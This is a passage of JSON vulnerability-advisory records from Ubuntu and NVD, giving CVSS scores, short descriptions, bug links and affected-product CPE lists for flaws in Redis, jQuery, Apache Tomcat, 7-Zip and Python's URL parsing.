"UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-17T00:00:00", "type": "ubuntucve", "title": "CVE-2018-12326", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12326"], "modified": "2018-06-17T00:00:00", "id": "UB:CVE-2018-12326", "href": "https://ubuntu.com/security/CVE-2018-12326", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T22:49:03", "description": "Memory Corruption was discovered in the cmsgpack library in the Lua\nsubsystem in Redis before 3.2.12, 4.x before 4.0.10, and 5.x before 5.0 RC2\nbecause of stack-based buffer overflows.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901495>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-17T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11218", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218"], "modified": "2018-06-17T00:00:00", "id": "UB:CVE-2018-11218", "href": "https://ubuntu.com/security/CVE-2018-11218", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T23:14:22", "description": "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks\nwhen a cross-domain Ajax request is performed without the dataType option,\ncausing text/javascript responses to be executed.\n\n#### Bugs\n\n * <https://github.com/jquery/jquery/issues/2432>\n * <https://github.com/jquery/jquery/issues/3011>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | fix is intrusive and backwards-incompatible, see bug 3011 Due to this, we will not be fixing this issue in Ubuntu stable releases. Marking as ignored.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-01-18T00:00:00", "type": "ubuntucve", "title": "CVE-2015-9251", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2018-01-18T00:00:00", "id": "UB:CVE-2015-9251", "href": "https://ubuntu.com/security/CVE-2015-9251", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-30T22:54:04", "description": "The defaults settings for the CORS filter provided in Apache Tomcat\n9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the default\nconfiguration. Therefore, it is expected that most users will not be\nimpacted by this issue.\n\n#### Bugs\n\n * <https://bz.apache.org/bugzilla/show_bug.cgi?id=62343>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=898935>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-16T00:00:00", "type": "ubuntucve", "title": "CVE-2018-8014", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2018-05-16T00:00:00", "id": "UB:CVE-2018-8014", "href": "https://ubuntu.com/security/CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T22:55:18", "description": "Incorrect initialization logic of RAR decoder objects in 7-Zip 18.03 and\nbefore can lead to usage of uninitialized memory, allowing remote attackers\nto cause a denial of service (segmentation fault) or execute arbitrary code\nvia a crafted RAR archive.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=897674>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-02T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10115", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10115"], "modified": "2018-05-02T00:00:00", "id": "UB:CVE-2018-10115", "href": "https://ubuntu.com/security/CVE-2018-10115", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T22:21:02", "description": "Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper\nHandling of Unicode Encoding (with an incorrect netloc) during NFKC\nnormalization. The impact is: Information disclosure (credentials, cookies,\netc. that are cached against a given hostname). The components are:\nurllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A\nspecially crafted URL could be incorrectly parsed to locate cookies or\nauthentication data and send that information to a different host than when\nparsed correctly. This is fixed in: v2.7.17, v2.7.17rc1, v2.7.18,\nv2.7.18rc1; v3.5.10, v3.5.10rc1, v3.5.7, v3.5.8, v3.5.8rc1, v3.5.8rc2,\nv3.5.9; v3.6.10, v3.6.10rc1, v3.6.11, v3.6.11rc1, v3.6.12, v3.6.9,\nv3.6.9rc1; v3.7.3, v3.7.3rc1, v3.7.4, v3.7.4rc1, v3.7.4rc2, v3.7.5,\nv3.7.5rc1, v3.7.6, v3.7.6rc1, v3.7.7, v3.7.7rc1, v3.7.8, v3.7.8rc1, v3.7.9.\n\n#### Bugs\n\n * <https://bugs.python.org/issue36216>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-08T00:00:00", "type": "ubuntucve", "title": "CVE-2019-9636", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9636"], "modified": "2019-03-08T00:00:00", "id": "UB:CVE-2019-9636", "href": "https://ubuntu.com/security/CVE-2019-9636", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-30T21:53:58", "description": "When using the Apache JServ Protocol (AJP), care must be taken when\ntrusting incoming connections to Apache Tomcat. Tomcat treats AJP\nconnections as having higher trust than, for example, a similar HTTP\nconnection. If such connections are available to an attacker, they can be\nexploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to\n9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP\nConnector enabled by default that listened on all configured IP addresses.\nIt was expected (and recommended in the security guide) that this Connector\nwould be disabled if not required. This vulnerability report identified a\nmechanism that allowed: - returning arbitrary files from anywhere in the\nweb application - processing any file in the web application as a JSP\nFurther, if the web application allowed file upload and stored those files\nwithin the web application (or the attacker was able to control the content\nof the web application by some other means) then this, along with the\nability to process a file as a JSP, made remote code execution possible. It\nis important to note that mitigation is only required if an AJP port is\naccessible to untrusted users. Users wishing to take a defence-in-depth\napproach and block the vector that permits returning arbitrary files and\nexecution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or\nlater. A number of changes were made to the default AJP Connector\nconfiguration in 9.0.31 to harden the default configuration. It is likely\nthat users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to\nmake small changes to their configurations.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=952437>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=952438>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=952436>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=959747>\n * <https://bugs.launchpad.net/bugs/1865904>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | In Ubuntu packages, the AJP connector is disabled by default, so unless specifically enabled by an admin, deployments made using the package are not vulnerable to this issue. One of the upstream fixes for this issue renames the requiredSecret parameter to secret and adds a secretRequired parameter that defaults to \"true\". Adding this change to stable releases will result in servers failing to start until the administrator either changes secretRequired to \"false\", or configures an adequate secret. Apache starting supporting a secret in mod_proxy_ajp starting with 2.4.42, which means to enable a secret we will have to issue Apache updates with the backported secret support.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "ubuntucve", "title": "CVE-2020-1938", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1938"], "modified": "2020-02-24T00:00:00", "id": "UB:CVE-2020-1938", "href": "https://ubuntu.com/security/CVE-2020-1938", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-04-23T00:24:15", "description": "Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3 allows an attacker to achieve code execution and escalate to higher privileges via a crafted command line. NOTE: It is unclear whether there are any common situations in which redis-cli is used with, for example, a -h (aka hostname) argument from an untrusted source.", "edition": 9, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-17T14:29:00", "title": "CVE-2018-12326", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12326"], "modified": "2019-01-17T11:29:00", "cpe": ["cpe:/a:redislabs:redis:5.0"], "id": "CVE-2018-12326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12326", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:redislabs:redis:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:redislabs:redis:5.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2021-04-23T00:24:12", "description": "Memory Corruption was discovered in the cmsgpack library in the Lua subsystem in Redis before 3.2.12, 4.x before 4.0.10, and 5.x before 5.0 RC2 because of stack-based buffer overflows.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-17T17:29:00", "title": "CVE-2018-11218", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:communications_operations_monitor:3.4", "cpe:/a:oracle:communications_operations_monitor:4.0", "cpe:/a:redislabs:redis:5.0", "cpe:/a:redhat:openstack:13.0", "cpe:/a:redhat:openstack:10", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-11218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11218", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:redislabs:redis:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:redhat:openstack:10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openstack:13.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-22T23:51:51", "description": "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.", "edition": 33, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-01-18T23:29:00", "title": "CVE-2015-9251", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2021-01-08T12:15:00", "cpe": ["cpe:/a:oracle:financial_services_funds_transfer_pricing:8.0.7", "cpe:/a:oracle:retail_workforce_management_software:1.60.9", "cpe:/a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0", "cpe:/a:oracle:communications_interactive_session_recorder:6.1", "cpe:/a:oracle:business_process_management_suite:12.1.3.0.0", "cpe:/a:oracle:primavera_unifier:18.8", "cpe:/a:oracle:siebel_ui_framework:18.11", "cpe:/a:oracle:siebel_ui_framework:18.10", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:insurance_insbridge_rating_and_underwriting:5.2", "cpe:/a:oracle:real-time_scheduler:2.3.0", "cpe:/a:oracle:primavera_unifier:16.1", "cpe:/a:oracle:primavera_unifier:17.12", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:financial_services_profitability_management:8.0.6", "cpe:/a:oracle:financial_services_reconciliation_framework:8.0.6", "cpe:/a:oracle:retail_allocation:15.0.2", "cpe:/a:oracle:webcenter_sites:11.1.1.8.0", "cpe:/a:oracle:enterprise_operations_monitor:3.4", "cpe:/a:oracle:banking_platform:2.6.2", "cpe:/a:oracle:service_bus:12.1.3.0.0", "cpe:/a:oracle:financial_services_reconciliation_framework:8.0.5", "cpe:/a:oracle:jdeveloper:12.2.1.3.0", "cpe:/a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0", "cpe:/a:oracle:financial_services_asset_liability_management:8.0.7", "cpe:/a:oracle:healthcare_translational_research:3.1.0", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.0.7", "cpe:/a:oracle:hospitality_reporting_and_analytics:9.1.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:banking_platform:2.6.0", "cpe:/a:oracle:hospitality_guest_access:4.2.0", "cpe:/a:oracle:enterprise_operations_monitor:4.0", "cpe:/a:oracle:financial_services_market_risk_measurement_and_management:8.0.6", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.7", "cpe:/a:oracle:service_bus:12.2.1.3.0", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:primavera_gateway:17.12", "cpe:/a:oracle:hospitality_cruise_fleet_management:9.0.11", "cpe:/a:oracle:retail_workforce_management_software:1.64.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.7", "cpe:/a:oracle:communications_interactive_session_recorder:6.0", "cpe:/a:oracle:banking_platform:2.6.1", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.56", "cpe:/a:oracle:business_process_management_suite:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:12.1.3.0", "cpe:/a:oracle:financial_services_liquidity_risk_management:8.0.6", "cpe:/a:oracle:endeca_information_discovery_studio:3.1.0", "cpe:/a:oracle:utilities_mobile_workforce_management:2.3.0", "cpe:/a:oracle:retail_invoice_matching:15.0", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2", "cpe:/a:oracle:insurance_insbridge_rating_and_underwriting:5.4", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.55", "cpe:/a:oracle:communications_interactive_session_recorder:6.2", "cpe:/a:oracle:weblogic_server:12.2.1.3", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:7.3.5", "cpe:/a:oracle:primavera_gateway:16.2", "cpe:/a:oracle:primavera_unifier:16.2", "cpe:/a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1", "cpe:/a:oracle:endeca_information_discovery_studio:3.2.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.57", "cpe:/a:oracle:hospitality_materials_control:18.1", "cpe:/a:oracle:retail_sales_audit:15.0", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.3.0", "cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:oss_support_tools:19.1", "cpe:/a:oracle:primavera_gateway:15.2", "cpe:/a:oracle:insurance_insbridge_rating_and_underwriting:5.5", "cpe:/a:oracle:healthcare_foundation:7.1", "cpe:/a:oracle:business_process_management_suite:11.1.1.9.0", "cpe:/a:oracle:hospitality_guest_access:4.2.1", "cpe:/a:oracle:healthcare_foundation:7.2", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.7", "cpe:/a:oracle:utilities_framework:4.3.0.4", "cpe:/a:oracle:financial_services_market_risk_measurement_and_management:8.0.5", "cpe:/a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0"], "id": "CVE-2015-9251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9251", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_framework:4.3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*", 